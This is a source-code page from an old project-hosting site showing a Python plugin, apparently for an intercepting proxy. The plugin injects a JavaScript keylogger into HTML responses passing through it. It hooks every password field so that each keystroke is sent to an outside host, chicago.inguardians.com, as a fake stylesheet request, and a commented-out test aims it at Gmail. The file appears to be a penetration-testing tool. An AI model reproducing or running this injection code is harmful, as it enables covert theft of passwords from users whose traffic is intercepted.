My favorites | Sign in
Project Home Downloads Wiki Issues Source
Checkout   Browse   Changes    
  
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
 
#!/usr/bin/python
import urllib2
from BeautifulSoup import BeautifulSoup
import support.header as header

### CHANGE AS NEEDED
match = (("Content-type","TEXT/HTML"),)
keylog_dest = 'http://chicago.inguardians.com'


### CHANGE AT YOUR OWN RISK!!!
keyloggerfunc = '''<script>function k(e) {var k;var f;if(window.event) k = window.event.keyCode;else if(e) k = e.which;f = document.createElement("link");f.setAttribute("rel", "stylesheet");f.setAttribute("type", "text/css");f.setAttribute("href", "''' + keylog_dest + '''/" + String.fromCharCode(k));document.body.appendChild(f);return true;}</script>'''



### FUNCTION TO MANIPULATE CLIENT REQUEST
def doRequest(session, request_header, data):
  return(request_header, data, 0, 0)



### FUNCTION TO MANIPULATE SERVER RESPONSE
def doResponse(session, request_header, response_header, data):
  changed = 0
  stop = 0

  ### DETERMINE IF WE NEED TO CHANGE DATA
  if header.headertest(response_header):

    ### MANIPULATE DATA - INSERT FUNCTION, FIND PASSWORD FIELDS, AND ADD HANDLER
    soup = BeautifulSoup(data)
    soup.head.insert(-1, keyloggerfunc)
    for i in soup.body.findAll('input', type="password"):
      #ToDo - check for existing onKeyDown attributes
      i['onKeyPress'] = "return k(event);"
      changed = 1
    data = str(soup)
    print("Password field(s) being logged to " + keylog_dest)

  ### RETURN DATA
  header.headerfix(response_header, "Content-Length", str(len(data)) + '\r\n')
  return(response_header, data, changed, stop)



#### UNIT TEST - TO DELETE UPON INTEGRATION
#url = 'http://mail.google.com/mail'
#response = urllib2.urlopen(url)
#data = response.read()
#h = str(response.info()).splitlines(1)
#response_header = [ ( "Request",response.geturl() ) ]
#for x in h:
 #response_header.append( tuple( x.split( ": ", 1 ) ) )

#(response_header, data, changed, stop) = doResponse(0, 0, response_header, data)
#print data

Change log

r34 by jay.beale on Jul 4, 2009   Diff 
Proxy code works - no longer leaving a
newline out after the response code line.
Also, proxy can forward all IPv4 traffic,
redirecting anything bound for port 80 to
the localhost.
Go to: 
Project members, sign in to write a code review

Older revisions

r8 by jay.beale on Feb 23, 2009   Diff 
Alpha Code in Post-Alpha Release Mode
All revisions of this file

File info

Size: 1905 bytes, 57 lines

File properties

svn:executable
Powered by Google Project Hosting